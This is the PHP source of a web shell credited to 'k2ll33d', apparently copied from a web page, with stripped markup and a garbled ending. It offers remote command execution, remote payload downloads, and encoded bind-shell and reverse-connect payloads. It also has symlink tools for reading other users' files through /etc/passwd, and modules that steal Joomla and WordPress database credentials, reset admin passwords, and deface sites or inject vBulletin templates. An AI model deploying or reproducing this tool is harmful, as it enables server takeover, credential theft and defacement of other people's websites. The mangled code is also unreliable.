// by k2ll33d / fb/k2ll33d
set_time_limit(0);error_reporting(0);
if(isset($_GET[“dl”]) && ($_GET[“dl”] != “”)){$file = $_GET[“dl”];$filez = @file_get_contents($file);header(“Content-type: application/octet-stream”);header(“Content-length: “.strlen($filez));header(“Content-disposition: attachment;filename=”.basename($file).”;”);echo $filez;exit;}
elseif(isset($_GET[“dlgzip”]) && ($_GET[“dlgzip”] != “”)){$file = $_GET[‘dlgzip’];$filez = gzencode(@file_get_contents($file));header(“Content-Type:application/x-gzip\n”);header(“Content-length: “.strlen($filez));header(“Content-disposition: attachment;filename=”.basename($file).”.gz;”);echo $filez;exit;}
if(isset($_GET[“img”])){@ob_clean();$d = magicboom($_GET[“y”]);$f = $_GET[“img”];$inf = @getimagesize($d.$f);$ext = explode($f,”.”);$ext = $ext[count($ext)-1];@header(“Content-type: “.$inf[“mime”]);@header(“Cache-control: public”);@header(“Expires: “.date(“r”,mktime(0,0,0,1,1,2030)));@header(“Cache-control: max-age=”.(60*60*24*7));@readfile($d.$f);exit;} $software = getenv(“SERVER_SOFTWARE”);
if (@ini_get(“safe_mode”) or strtolower(@ini_get(“safe_mode”)) == “on”) $safemode = TRUE;else $safemode = FALSE;$system = @php_uname();if(strtolower(substr($system,0,3)) == “win”)
$win = TRUE;else $win = FALSE;if(isset($_GET[‘y’])){if(@is_dir($_GET[‘view’])){$pwd = $_GET[‘view’];@chdir($pwd);} else{$pwd = $_GET[‘y’];@chdir($pwd);} }
if(!$win){if(!$user = rapih(exe(“whoami”)))$user = “”;if(!$id = rapih(exe(“id”))) $id = “”;$prompt = $user.” \$ “;$pwd = @getcwd().DIRECTORY_SEPARATOR;}
else {$user = @get_current_user();$id = $user;$prompt = $user.” >”;$pwd = realpath(“.”).”\\”;$v = explode(“\\”,$d);$v = $v[0];foreach (range(“A”,”Z”) as $letter) {$bool = @is_dir($letter.”:\\”);if ($bool){$letters .= “[ “;if ($letter.”:” != $v){$letters .= $letter;} else {$letters .= ““.$letter.”“;} $letters .= ” ] “;}}}
if(function_exists(“posix_getpwuid”) && function_exists(“posix_getgrgid”)) $posix = TRUE;
else $posix = FALSE;$server_ip = @gethostbyname($_SERVER[“HTTP_HOST”]);$my_ip = $_SERVER[‘REMOTE_ADDR’];$bindport = “13123”;$bindport_pass = “k2ll33d”;$pwds = explode(DIRECTORY_SEPARATOR,$pwd);$pwdurl = “”;for($i = 0 ;$i < sizeof($pwds)-1 ;$i++){$pathz = “”;for($j = 0 ;$j <= $i ;$j++){$pathz .= $pwds[$j].DIRECTORY_SEPARATOR;} $pwdurl .= ““.$pwds[$i].” “.DIRECTORY_SEPARATOR.” “;}
if(isset($_POST[‘rename’])){$old = $_POST[‘oldname’];$new = $_POST[‘newname’];@rename($pwd.$old,$pwd.$new);$file = $pwd.$new;} if(isset($_POST[‘chmod’])){
$name = $_POST[‘name’];$value = $_POST[‘newvalue’];if (strlen($value)==3){$value = 0 . “” . $value;}@chmod($pwd.$name,octdec($value));$file = $pwd.$name;}
if(isset($_POST[‘chmod_folder’])){$name = $_POST[‘name’];$value = $_POST[‘newvalue’];if (strlen($value)==3){$value = 0 . “” . $value;}@chmod($pwd.$name,octdec($value));$file = $pwd.$name;} $buff = ” “.$software.”
“;$buff .= ” “.$system.”
“;if($id != “”) $buff .= ” “.$id.”
“;if($safemode) $buff .= ” safemode : ON
“;else $buff .= ” safemode : OFF
“;
function showstat($stat) {if ($stat==”on”) {return “ON“;}else {return “OFF“;}}
function testmysql() {if (function_exists(‘mysql_connect’)) {return showstat(“on”);}else {return showstat(“off”);}}
function testcurl() {if (function_exists(‘curl_version’)) {return showstat(“on”);}else {return showstat(“off”);}}
function testwget() {if (exe(‘wget –help’)) {return showstat(“on”);}else {return showstat(“off”);}}
function testperl() {if (exe(‘perl -h’)) {return showstat(“on”);}else {return showstat(“off”);}}
$buff .= ” MySQL: “.testmysql().” | Perl: “.testperl().” | cURL: “.testcurl().” | WGet: “.testwget().”
“;
$buff .= ” “.$letters.” > “.$pwdurl;
function rapih($text){return trim(str_replace(”
“,””,$text));}
function magicboom($text){if (!get_magic_quotes_gpc()){return $text;} return stripslashes($text);}
function showdir($pwd,$prompt){$fname = array();$dname = array();
if(function_exists(“posix_getpwuid”) && function_exists(“posix_getgrgid”))
$posix = TRUE;else $posix = FALSE;$user = “????:????”;
if($dh = opendir($pwd)){while($file = readdir($dh)){
if(is_dir($file)){$dname[] = $file;}
elseif(is_file($file)){$fname[] = $file;}}closedir($dh);} sort($fname);sort($dname);$path = @explode(DIRECTORY_SEPARATOR,$pwd);$tree = @sizeof($path);$parent = “”;
$buff = ”

$prompt
view file/folder

“;
if($tree > 2)
for($i=0;$i<$tree-2;$i++) $parent .= $path[$i].DIRECTORY_SEPARATOR;
else $parent = $pwd;
foreach($dname as $folder){
if($folder == “.”) {
if(!$win && $posix){$name=@posix_getpwuid(@fileowner($folder));$group=@posix_getgrgid(@filegroup($folder));$owner = $name[‘name’].” : “.$group[‘name’];}
else {$owner = $user;}
$buff .= ”

“;}
elseif($folder == “..”){
if(!$win && $posix)
{$name=@posix_getpwuid(@fileowner($folder));$group=@posix_getgrgid(@filegroup($folder));
$owner = $name[‘name’].” : “.$group[‘name’];}
else { $owner = $user; }
$buff .= ”

“;}else{if(!$win && $posix){
$name=@posix_getpwuid(@fileowner($folder));
$group=@posix_getgrgid(@filegroup($folder));
$owner = $name[‘name’].” : “.$group[‘name’];}
else { $owner = $user; }
$buff .= ”
“;}}
foreach($fname as $file){
$full = $pwd.$file;
if(!$win && $posix){$name=@posix_getpwuid(@fileowner($file)); $group=@posix_getgrgid(@filegroup($file)); $owner = $name[‘name’].” : “.$group[‘name’];}
else { $owner = $user; }
$buff .= ”

“;}
$buff .= ”

name size owner:group perms modified actions
$folder “.$owner.”
“.get_perms($pwd).”
 “.date(“d-M-Y H:i”,@filemtime($pwd)).”
newfile | newfolder
“.$owner.”
“.get_perms($parent).”
 “.date(“d-M-Y H:i”,@filemtime($parent)).” newfile | newfolder
$folder




 DIR “.$owner.”

“.get_perms($pwd.$folder).”




onclick=\”tukar(‘”.clearspace($folder).”_link’,'”.clearspace($folder).”_form3′);\” />

 “.date(“d-M-Y H:i”,@filemtime($folder)).” rename| delete
$file

 “.ukuran($full).” “.$owner.”

“.get_perms($full).”




 “.date(“d-M-Y H:i”,@filemtime($full)).” edit | rename| delete | download (gz)

“; return $buff;}
function ukuran($file){if($size = @filesize($file)){if($size <= 1024) return $size;else{if($size <= 1024*1024) {$size = @round($size / 1024,2);;
return “$size kb”;} else {$size = @round($size / 1024 / 1024,2);return “$size mb”;}}}
else return “???”;} function exe($cmd){if(function_exists(‘system’)) {@ob_start();@system($cmd);$buff = @ob_get_contents();$buff = @ob_get_contents();@ob_end_clean();
return $buff;} elseif(function_exists(‘exec’)) {@exec($cmd,$results);$buff = “”;foreach($results as $result){$buff .= $result;} return $buff;}
elseif(function_exists(‘passthru’)){@ob_start();@passthru($cmd);$buff = @ob_get_contents();@ob_end_clean();return $buff;}
elseif(function_exists(‘shell_exec’)){$buff = @shell_exec($cmd);return $buff;}} function tulis($file,$text){$textz = gzinflate(base64_decode($text));if($filez = @fopen($file,”w”)) {@fputs($filez,$textz);@fclose($file);}}
function ambil($link,$file) {if($fp = @fopen($link,”r”)){while(!feof($fp)){$cont.= @fread($fp,1024);}@fclose($fp);$fp2 = @fopen($file,”w”);@fwrite($fp2,$cont);@fclose($fp2);} }
function which($pr){$path = exe(“which $pr”);
if(!empty($path)) {return trim($path);}
else {return trim($pr);}}
function download($cmd,$url){$namafile = basename($url);
switch($cmd){case ‘wwget’: exe(which(‘wget’).” “.$url.” -O “.$namafile);break;case ‘wlynx’: exe(which(‘lynx’).” -source “.$url.” > “.$namafile);break;case ‘wfread’ : ambil($wurl,$namafile);break;case ‘wfetch’ : exe(which(‘fetch’).” -o “.$namafile.” -p “.$url);break;case ‘wlinks’ : exe(which(‘links’).” -source “.$url.” > “.$namafile);break;case ‘wget’ : exe(which(‘GET’).” “.$url.” > “.$namafile);break;case ‘wcurl’ : exe(which(‘curl’).” “.$url.” -o “.$namafile);break;default: break;}
return $namafile;}function get_perms($file) {if($mode=@fileperms($file)){$perms=”;$perms .= ($mode & 00400) ? ‘r’ : ‘-‘;$perms .= ($mode & 00200) ? ‘w’ : ‘-‘;$perms .= ($mode & 00100) ? ‘x’ : ‘-‘;$perms .= ($mode & 00040) ? ‘r’ : ‘-‘;$perms .= ($mode & 00020) ? ‘w’ : ‘-‘;$perms .= ($mode & 00010) ? ‘x’ : ‘-‘;$perms .= ($mode & 00004) ? ‘r’ : ‘-‘;$perms .= ($mode & 00002) ? ‘w’ : ‘-‘;$perms .= ($mode & 00001) ? ‘x’ : ‘-‘;
return $perms;}else return “??????????”;}function clearspace($text){return str_replace(” “,”_”,$text);}$port_bind_bd_c=”bVNhb9owEP2OxH+4phI4NINAN00aYxJaW6maxqbSLxNDKDiXxiLYkW3KGOp/3zlOpo7xIY793jvf +fl8KSQvdinCR2NTofr5p3br8hWmhXw6BQ9mYA8lmjO4UXyD9oSQaAV9AyFPCNRa+pRCWtgmQrJE P/GIhufQg249brd4nmjo9RxBqyNAuwWOdvmyNAKJ+ywlBirhepctruOlW9MJdtzrkjTVKyFB41ZZ dKTIWKb0hoUwmUAcwtFt6+m+EXKVJVtRHGAC07vV/ez2cfwvXSpticytkoYlVglX/fNiuAzDE6VL 3TfVrw4o2P1senPzsJrOfoRjl9cfhWjvIatzRvNvn7+s5o8Pt9OvURzWZV94dQgleag0C3wQVKug Uq2FTFnjDzvxAXphx9cXQfxr6PcthLEo/8a8q8B9LgpkQ7oOgKMbvNeThHMsbSOO69IA0l05YpXk HDT8HxrV0F4LizUWfE+M2SudfgiiYbONxiStebrgyIjfqDJG07AWiAzYBc9LivU3MVpGFV2x1J4W tyxAnivYY8HVFsEqWF+/f7sBk2NRQKcDA/JtsE5MDm9EUG+MhcFqkpX0HmxGbqbkdBTMldaHRsUL ZeoDeOSFBvpefCfXhflOpgTkvJ+jtKiR7vLohYKCqS2ZmMRj4Z5gQZfSiMbi6iqkdnHarEEXYuk6 uPtTdumsr0HC4q5rrzNifV7sC3ZWUmq+LVlVa5OfQjTanZYQO+Uf”;$port_bind_bd_pl=”ZZJhT8IwEIa/k/AfjklgS2aA+BFmJDB1cW5kHSZGzTK2Qxpmu2wlYoD/bruBIfitd33uvXuvvWr1 NmXRW1DWy7HImo02ebRd19Kq1CIuV3BNtWGzQZeg342DhxcYwcCAHeCWCn1gDOEgi1yHhLYXzfwg tNqKeut/yKJNiUB4skYhg3ZecMETnlmfKKrz4ofFX6h3RZJ3DUmUFaoTszO7jxzPDs0O8SdPEQkD e/xs/gkYsN9DShG0ScwEJAXGAqGufmdq2hKFCnmu1IjvRkpH6hE/Cuw5scfTaWAOVE9pM5WMouM0 LSLK9HM3puMpNhp7r8ZFW54jg5wXx5YZLQUyKXVzwdUXZ+T3imYoV9ds7JqNOElQTjnxPc8kRrVo vaW3c5paS16sjZo6qTEuQKU1UO/RSnFJGaagcFVbjUTCqeOZ2qijNLWzrD8PTe32X9oOgvM0bjGB +hecfOQFlT4UcLSkmI1ceY3VrpKMy9dWUCVCBfTlQX6Owy8=”;$back_connect=”fZFRS8MwFIXfB/sPWSw2hUrnqyPC0CpD3KStvqh0XRpcsE1KkoKF/XiTtCIV6tu55+Z89yY5W0St ktGB8aihsprPWkVBKsgn1av5zCN1iQGsOv4Fbak6pWmNgU/JUQC4b3lRU3BR7OFqcFhptMOpo28j S2whVulCflCNvXVy//K6fLdWI+SPcekMVpSlxIxTnRdacDSEAnA6gZJRBGMphbwC3uKNw8AhXEKZ ja3ImclYagh61n9JKbTAhu7EobN3Qb4mjW/byr0BSnc3D3EWgqe7fLO1whp5miXx+tHMcNHpGURw Tskvpd92+rxoKEdpdrvZhgBen/exUWf3nE214iT52+r/Cw3/5jaqhKL9iFFpuKPawILVNw==”;$back_connect_c=”XVHbagIxEH0X/IdhhZLUWF1f1YKIBelFqfZJliUm2W7obiJJLLWl/94k29rWhyEzc+Z2TjpSserA BYyt41JfldftVuc3d7R9q9mLcGeAEk5660sVAakc1FQqFBxqnhkBVlIDl95/3Wa43fpotyCABR95 zzpzYA7CaMq5yaUCK1VAYpup7XaYZpPE1NArIBmBRzgVtVYoJQMcR/jV3vKC1rI6wgSmN/niYb75 i+21cR4pnVYWUaclivcMM/xvRDjhysbHVwde0W+K0wzH9bt3YfRPingClVCnim7a/ZuJC0JTwf3A RkD0fR+B9XJ2m683j/PpPYHFavW43CzzzWyFIfbIAhBiWinBHCo4AXSmFlxiuPB3E0/gXejiHMcY jwcYguIAe2GMNijZ9jL4GYqTSB9AvEmHGjk/m19h1CGvPoHIY5A1Oh2tE3XIe1bxKw77YTyt6T2F 6f9wGEPxJliFkv5Oqr4tE5LYEnoyIfDwdHcXK1ilrfAdUbPPLw==”; ?>
k2ll33d

 server ip :
your ip : “.$my_ip.”
“;?>
H O M E

elseif(isset($_GET[‘x’]) && ($_GET[‘x’] == ‘about’)){echo ‘

K2ll33d Shell

By K2ll33d

Mail | Facebook | Zone-H

‘.date(‘Y’).’

‘;}
elseif(isset($_GET[‘x’]) && ($_GET[‘x’] == ‘sf’)) {@set_time_limit(0);@mkdir(‘sym’,0777);error_reporting(0);$htaccess = “Options all \n DirectoryIndex gaza.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any”;$op =@fopen (‘sym/.htaccess’,’w’);fwrite($op ,$htaccess);echo ‘

Symlinker

File Path:

Symlink Name

‘;$target = $_POST[‘file’];$symfile = $_POST[‘symfile’];$symlink = $_POST[‘symlink’];if ($symlink) {@symlink(“$target”,”sym/$symfile”);echo ‘
‘.$symfile.’

‘;}}
elseif(isset($_GET[‘x’]) && ($_GET[‘x’] == ‘js’)) {if ($_POST[‘symjo’]) {$config = file_get_contents($_POST[‘url’]);$user = $_POST[‘user’];$pass = md5($_POST[‘pass’]);function ex($text,$a,$b){$explode = explode($a,$text);$explode = explode($b,$explode[1]);return $explode[0];}if($config && ereg(‘JConfig’,$config)){$psswd = ex($config,’$password = \”,”‘;”);$username = ex($config,’$user = \”,”‘;”);$dbname = ex($config,’$db = \”,”‘;”);$prefix = ex($config,’$dbprefix = \”,”‘;”);$host = ex($config,’$host = \”,”‘;”);$email = ex($config,’$mailfrom = \”,”‘;”);$formn = ex($config,’$fromname = \”,”‘;”);$conn = mysql_connect($host,$username,$psswd) or die(mysql_error());mysql_select_db($dbname,$conn) or die($username.’ ‘.$psswd.’ ‘.$host.’ ‘.$dbname);$query = @mysql_query(“UPDATE `”.$prefix.”users` SET `username` ='”.$user.”‘ , `password` = ‘”.$pass.”‘, `usertype` = ‘Super Administrator’, `block` = 0″);if ($query) {echo ‘

Done !

site name user password email
‘.$formn.’ ‘.$user.’ ‘.$_POST[“pass”].’ ‘.$email.’

‘;}else {echo ‘

ERROR !

‘;}}else die(‘

Not a joomla config

‘);}else { ?>

Joomla login changer ( symlink version )

config link :
new user :
new password :

elseif(isset($_GET[‘x’]) && ($_GET[‘x’] == ‘sec’)){$d0mains = @file(“/etc/named.conf”);
if($d0mains){@mkdir(“k2”,0777);@chdir(“k2”);@exe(“ln -s / root”);
$file3 = ‘Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any’;
$fp3 = fopen(‘.htaccess’,’w’);$fw3 = fwrite($fp3,$file3);@fclose($fp3);
echo “”;$dcount = 1;foreach($d0mains as $d0main){if(eregi(“zone”,$d0main)){preg_match_all(‘#zone “(.*)”#’, $d0main, $domains);flush();if(strlen(trim($domains[1][0])) > 2){$user = posix_getpwuid(@fileowner(“/etc/valiases/”.$domains[1][0]));echo “”; flush();$dcount++;}}}echo ”

S. No. Domains Users Symlink
” . $dcount . “ “.$domains[1][0].” “.$user[‘name’].” Symlink

“;}else{$TEST=@file(‘/etc/passwd’);if ($TEST){@mkdir(“k2”,0777);@chdir(“k2”);exe(“ln -s / root”);
echo ”

“;$dcount = 1;$file = fopen(“/etc/passwd”, “r”) or exit(“Unable to open file!”);while(!feof($file)){$s = fgets($file);$matches = array();$t = preg_match(‘/\/(.*?)\:\//s’, $s, $matches);$matches = str_replace(“home/”,””,$matches[1]);if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == “bin” || $matches == “etc/X11/fs” || $matches == “var/lib/nfs” || $matches == “var/arpwatch” || $matches == “var/gopher” || $matches == “sbin” || $matches == “var/adm” || $matches == “usr/games” || $matches == “var/ftp” || $matches == “etc/ntp” || $matches == “var/www” || $matches == “var/named”)continue;echo “”;echo “”;$dcount++;}fclose($file);echo ”

S. No. Users Symlink
” . $dcount . “ ” . $matches . “ Symlink

“;}else{if($os != “Windows”){@mkdir(“k2”,0777);@chdir(“k2”);@exe(“ln -s / root”);
echo ”

server symlinker

“;$temp = “”;$val1 = 0;$val2 = 1000;for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1);if ($uid)$temp .= join(‘:’,$uid).”\n”;}echo ‘
‘;$temp = trim($temp);$file5 = fopen(“test.txt”,”w”);fputs($file5,$temp);fclose($file5);$dcount = 1;$file = fopen(“test.txt”, “r”) or exit(“Unable to open file!”);while(!feof($file)){$s = fgets($file);$matches = array();$t = preg_match(‘/\/(.*?)\:\//s’, $s, $matches);$matches = str_replace(“home/”,””,$matches[1]);if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == “bin” || $matches == “etc/X11/fs” || $matches == “var/lib/nfs” || $matches == “var/arpwatch” || $matches == “var/gopher” || $matches == “sbin” || $matches == “var/adm” || $matches == “usr/games” || $matches == “var/ftp” || $matches == “etc/ntp” || $matches == “var/www” || $matches == “var/named”)continue;echo “”;echo “”;$dcount++;}fclose($file);echo ”

id Users Symlink
” . $dcount . “ ” . $matches . “ Symlink

“;unlink(“test.txt”);} else echo “
Cannot create Symlink
“;}}}
elseif(isset($_GET[‘x’]) && ($_GET[‘x’] == ‘mass’)){error_reporting(0);?>

Folder Mass Defacer


Folder :

File Name :

index URL :

“;$dir=opendir(“$mainpath”);while($row=readdir($dir)){$start=@fopen(“$row/$file”,”w+”);$code=@file_get_contents($indexurl);$finish=@fwrite($start,$code);if ($finish){echo “» $row/$file » Done

“;}}}
elseif(isset($_GET[‘x’]) && ($_GET[‘x’] == ‘vb’)) {if(empty($_POST[‘index’])){echo “

Vbulletin index changer

host :  | database :  | username :  | password :  | perfix :


“;}else{$localhost = $_POST[‘localhost’];$database = $_POST[‘database’];$username = $_POST[‘username’];$password = $_POST[‘password’];$perfix = $_POST[‘perfix’];$index = $_POST[‘index’];@mysql_connect($localhost,$username,$password) or die(mysql_error());@mysql_select_db($database) or die(mysql_error());$index=str_replace(“\'”,”‘”,$index);$set_index = “{\${eval(base64_decode(\'”;$set_index .= base64_encode(“echo ‘$index’;”);$set_index .= “\’))}}{\${exit()}}”;$ok=@mysql_query(“UPDATE “.$perfix.”template SET template ='”.$set_index.”‘ WHERE title =’FORUMHOME'”) or die(mysql_error());if($ok){echo “Defaced

“;}}}
elseif(isset($_GET[‘x’]) && ($_GET[‘x’] == ‘boom’)){error_reporting(0);function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){$ar0=explode($marqueurDebutLien, $text);$ar1=explode($marqueurFinLien, $ar0[$i]);return trim($ar1[0]);}function randomt() {$chars = “abcdefghijkmnopqrstuvwxyz023456789″;srand((double)microtime()*1000000);$i = 0;$pass = ”;while ($i <= 7) {$num = rand() % 33;$tmp = substr($chars, $num, 1);$pass = $pass . $tmp;$i++;}return $pass;}function index_changer_wp($conf, $content) {$output = ”;$dol = ‘$’;$go = 0;$username = entre2v2($conf,”define(‘DB_USER’, ‘”,”‘);”);$password = entre2v2($conf,”define(‘DB_PASSWORD’, ‘”,”‘);”);$dbname = entre2v2($conf,”define(‘DB_NAME’, ‘”,”‘);”);$prefix = entre2v2($conf,$dol.”table_prefix = ‘”,”‘”);$host = entre2v2($conf,”define(‘DB_HOST’, ‘”,”‘);”);$link=mysql_connect($host,$username,$password);if($link) {mysql_select_db($dbname,$link) ;$dol = ‘$’;$req1 = mysql_query(“UPDATE `”.$prefix.”users` SET `user_login` = ‘admin’,`user_pass` = ‘4297f44b13955235245b2497399d7a93′ WHERE `ID` = 1″);} else {$output.= “[-] DB Error
“;}if($req1) {$req = mysql_query(“SELECT * from `”.$prefix.”options` WHERE option_name=’home'”);$data = mysql_fetch_array($req);$site_url=$data[“option_value”]; $req = mysql_query(“SELECT * from `”.$prefix.”options` WHERE option_name=’template'”);$data = mysql_fetch_array($req);$template = $data[“option_value”];$req = mysql_query(“SELECT * from `”.$prefix.”options` WHERE option_name=’current_theme'”);$data = mysql_fetch_array($req);$current_theme = $data[“option_value”];$useragent=”Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)”;$url2=$site_url.”/wp-login.php”;$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS,”log=admin&pwd=123123&rememberme=forever&wp-submit=Log In&testcookie=1″);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, “COOKIE.txt”);curl_setopt($ch, CURLOPT_COOKIEFILE, “COOKIE.txt”);$buffer = curl_exec($ch);$pos = strpos($buffer,”action=logout”);if($pos === false) {$output.= “[-] Login Error
“;} else {$output.= “[+] Login Successful
“;$go = 1;}if($go) {$cond = 0;$url2=$site_url.”/wp-admin/theme-editor.php?file=/themes/”.$template.’/index.php&theme=’.urlencode($current_theme).’&dir=theme’;curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, “COOKIE.txt”);curl_setopt($ch, CURLOPT_COOKIEFILE, “COOKIE.txt”);$buffer0 = curl_exec($ch);$_wpnonce = entre2v2($buffer0,’‘);$_file = entre2v2($buffer0,’‘);if(substr_count($_file,”/index.php”) != 0){$output.= “[+] index.php loaded in Theme Editor
“;$url2=$site_url.”/wp-admin/theme-editor.php”;curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS,”newcontent=”.base64_decode($content).”&action=update&file=”.$_file.”&_wpnonce=”.$_wpnonce.”&submit=Update File”);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, “COOKIE.txt”);curl_setopt($ch, CURLOPT_COOKIEFILE, “COOKIE.txt”);$buffer = curl_exec($ch);curl_close($ch);$pos = strpos($buffer,’

‘);if($pos === false) {$output.= “[-] Updating Index.php Error
“;} else {$output.= “[+] Index.php Updated Successfuly
“;$hk = explode(‘public_html’,$_file);$output.= ‘[+] Deface ‘.file_get_contents($site_url.str_replace(‘/blog’,”,$hk[1]));$cond = 1;}} else {$url2=$site_url.’/wp-admin/theme-editor.php?file=index.php&theme=’.$template;curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, “COOKIE.txt”);curl_setopt($ch, CURLOPT_COOKIEFILE, “COOKIE.txt”);$buffer0 = curl_exec($ch);$_wpnonce = entre2v2($buffer0,’‘);$_file = entre2v2($buffer0,’‘);if(substr_count($_file,”index.php”) != 0){$output.= “[+] index.php loaded in Theme Editor
“;$url2=$site_url.”/wp-admin/theme-editor.php”;curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS,”newcontent=”.base64_decode($content).”&action=update&file=”.$_file.”&theme=”.$template.”&_wpnonce=”.$_wpnonce.”&submit=Update File”);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, “COOKIE.txt”);curl_setopt($ch, CURLOPT_COOKIEFILE, “COOKIE.txt”);$buffer = curl_exec($ch);curl_close($ch);$pos = strpos($buffer,’

‘);if($pos === false) {$output.= “[-] Updating Index.php Error
“;} else {$output.= “[+] Index.php Template Updated Successfuly
“;$output.= ‘[+] Deface ‘.file_get_contents($site_url.’/wp-content/themes/’.$template.’/index.php’);$cond = 1;}} else {$output.= “[-] index.php can not load in Theme Editor
“;}}}} else {$output.= “[-] DB Error
“;}global $base_path;unlink($base_path.’COOKIE.txt’);return array(‘cond’=>$cond, ‘output’=>$output);}function index_changer_joomla($conf, $content, $domain) {$doler = ‘$’;$username = entre2v2($conf, $doler.”user = ‘”, “‘;”);$password = entre2v2($conf, $doler.”password = ‘”, “‘;”);$dbname = entre2v2($conf, $doler.”db = ‘”, “‘;”);$prefix = entre2v2($conf, $doler.”dbprefix = ‘”, “‘;”);$host = entre2v2($conf, $doler.”host = ‘”,”‘;”);$co=randomt();$site_url = “http://”.$domain.”/administrator”;$output = ”;$cond = 0; $link=mysql_connect($host, $username, $password);if($link) {mysql_select_db($dbname,$link) ;$req1 = mysql_query(“UPDATE `”.$prefix.”users` SET `username` =’admin’ , `password` = ‘4297f44b13955235245b2497399d7a93’, `usertype` = ‘Super Administrator’, `block` = 0″);$req = mysql_numrows(mysql_query(“SHOW TABLES LIKE ‘”.$prefix.”extensions'”));} else {$output.= “[-] DB Error
“;}if($req1){if ($req) {$req = mysql_query(“SELECT * from `”.$prefix.”template_styles` WHERE `client_id` = ‘0’ and `home` = ‘1’”);$data = mysql_fetch_array($req);$template_name = $data[“template”];$req = mysql_query(“SELECT * from `”.$prefix.”extensions` WHERE `name`='”.$template_name.”‘ or `element` = ‘”.$template_name.”‘”);$data = mysql_fetch_array($req);$template_id = $data[“extension_id”];$url2=$site_url.”/index.php”;$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch);$return = entre2v2($buffer ,’” ;}=”” else=”” ;}}if($pos){$url2=”$site_url.”/index.php?option=com_templates&task=source.edit&id=”.base64_encode($template_id.”:index.php”);$ch” curl_init();curl_setopt($ch,=”” ‘,2);if($hidden2)=”” ;}}if($hidden2)=”” {$url2=”$site_url.”/index.php?option=com_templates&layout=edit”;$ch” curlopt_postfields,”jform[source]=”.$content.” &jform[filename]=”index.php&jform[extension_id]=”.$template_id.”&”.$hidden2.”=1&task=source.save”);curl_setopt($ch,” strpos($buffer,'<dd=”” class=”message message” type=”hidden”>’);$cond = 0;if($pos === false) {$output.= “[-] Updating Index.php Error
“;} else {$output.= “[+] Index.php Template successfully saved
“;$cond = 1;}}} else {$req =mysql_query(“SELECT * from `”.$prefix.”templates_menu` WHERE client_id=’0′”);$data = mysql_fetch_array($req);$template_name=$data[“template”];$useragent=”Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)”;$url2=$site_url.”/index.php”;$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch);$hidden=entre2v2($buffer ,’” ;}=”” else=”” ;}}if($pos)=”” {$url2=”$site_url.”/index.php?option=com_templates&task=edit_source&client=0&id=”.$template_name;curl_setopt($ch,” 1);curl_setopt($ch,curlopt_returntransfer,1);curl_setopt($ch,=”” ,'<input=”” ‘,6);if($hidden2)=”” ;}}if($hidden2)=”” curlopt_postfields,”filecontent=”.$content.” &id=”.$template_name.” &cid[]=”.$template_name.” &”.$hidden2.”=”1&task=save_source&client=0″);curl_setopt($ch,” $co);$buffer=”curl_exec($ch);curl_close($ch);$pos” strpos($buffer,'<dd=”” class=”message message fade” type=”hidden”>’);$cond = 0;if($pos === false) {$output.= “[-] Updating Index.php Error
“;} else {$output.= “[+] Index.php Template successfully saved
“;$cond = 1;}}}} else {$output.= “[-] DB Error
